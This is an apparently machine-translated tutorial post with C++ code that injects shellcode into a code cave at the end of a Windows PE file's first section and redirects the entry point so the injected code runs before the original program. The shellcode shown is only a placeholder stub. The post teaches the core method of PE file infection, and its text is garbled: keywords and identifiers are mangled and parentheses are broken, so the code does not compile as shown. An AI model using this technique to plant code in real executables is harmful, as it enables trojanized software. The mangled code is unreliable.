Insert shellcode into the interval of the PE section table

Insert shellcode into the interval of the PE section table
[Cpp]
// InsertShellCodeToPE. cpp: Defines the entry point for the console application.
//
 
# Include "stdafx. h"
# Include <Windows. h>
 
# Define FILENAME "hello.exe"
 
// Custom shellcode
Char shellcode [] = "\ x90 \ x90 \ x90 \ x90 \ xb8 \ x90 \ x90 \ x90 \ x90 \ xff \ xe0 \ x00 ";
 
 
DWORD FindSpace (LPVOID lpBase, PIMAGE_NT_HEADERS pNTHeader)
/*************************************** *********************************/
/* Function Description: Find the idle location in each block of the PE */
/* Parameter: base address of the lpBase PE file in the memory */
/* Pointer to the NT header of the pNTHeader PE file */
/* Return value: the idle address found is returned successfully. Otherwise, 0 */is returned */
/*************************************** *********************************/
{
PIMAGE_SECTION_HEADER ction;
Ction = (PIMAGE_SECTION_HEADER) (BYTE *) & pNTHeader-> OptionalHeader + pNTHeader-> FileHeader. SizeOfOptionalHeader );
DWORD dwAddr;
DwAddr = direction ction-> PointerToRawData + direction ction-> SizeOfRawData-sizeof (shellcode );
DwAddr = (DWORD) (BYTE *) lpBase + dwAddr );
 
While (dwAddr> callback ction-> Misc. VirtualSize)
{
DWORD I = 0;
For (I = 0; I <strlen (shellcode); I ++)
{
If (* (BYTE *) dwAddr + I )! = 0)
{
Break;
}
}
If (I = strlen (shellcode ))
{
Return dwAddr;
}
DwAddr --;
}
Return 0;
}
 
 
Int main (int argc, char * argv [])
{
HANDLE hFile =: CreateFile (FILENAME, FILE_GENERIC_READ | FILE_GENERIC_WRITE | FILE_GENERIC_EXECUTE, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL );
If (INVALID_HANDLE_VALUE = hFile)
{
Printf ("createfile error ");
Return-1;
}
HANDLE hFileMap =: CreateFileMapping (hFile, NULL, PAGE_READWRITE, 0, 0, NULL );
Int n = GetLastError ();
If (NULL = hFileMap)
{
Printf ("CreateFileMapping error ");
CloseHandle (hFile );
Return-1;
}
LPVOID lpMemory =: MapViewOfFile (hFileMap, FILE_MAP_ALL_ACCESS, 0, 0, 0 );
If (NULL = lpMemory)
{
Printf ("MapViewOfFile error ");
CloseHandle (hFileMap );
CloseHandle (hFile );
Return-1;
}

PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER) lpMemory;
PIMAGE_NT_HEADERS pNTHeader = (PIMAGE_NT_HEADERS) (DWORD) lpMemory + pDosHeader-> e_lfanew );
PIMAGE_FILE_HEADER pFileHeader = (PIMAGE_FILE_HEADER) & (pNTHeader-> FileHeader );
PIMAGE_OPTIONAL_HEADER pOptionalHeader = (PIMAGE_OPTIONAL_HEADER) & pNTHeader-> OptionalHeader;
 
PIMAGE_SECTION_HEADER direction ction = NULL;
IMAGE_SECTION_HEADER secToAdd = {0 };
 
If (pDosHeader-> e_magic! = IMAGE_DOS_SIGNATURE | pNTHeader-> Signature! = IMAGE_NT_SIGNATURE)
{
Printf ("Not valid PE file ...");
UnmapViewOfFile (lpMemory );
CloseHandle (hFileMap );
CloseHandle (hFile );
Return-1;
}
 
DWORD dwAddr = FindSpace (lpMemory, pNTHeader );
If (dwAddr = 0)
{
Printf ("the first section do not has enough space ");
UnmapViewOfFile (lpMemory );
CloseHandle (hFileMap );
CloseHandle (hFile );
Return-1;
} Www.2cto.com
 
DWORD dwOEP = pOptionalHeader-> AddressOfEntryPoint;
DwOEP = (DWORD) (pOptionalHeader-> ImageBase + dwOEP );
 
 
// Get the shellcode length first, because \ x00 will be filled in after filling below
DWORD dwShellcodeLen = strlen (shellcode );
// Fill the reserved bits in shellcode
* (DWORD *) & shellcode [5] = dwOEP;
 
Memcpy (char *) dwAddr, shellcode, dwShellcodeLen );
 
DwAddr = dwAddr-(DWORD) (BYTE *) lpMemory;
PNTHeader-> OptionalHeader. AddressOfEntryPoint = dwAddr;
 

 
: UnmapViewOfFile (lpMemory );
 

: CloseHandle (hFileMap );
: CloseHandle (hFile );
 
Return 0;
}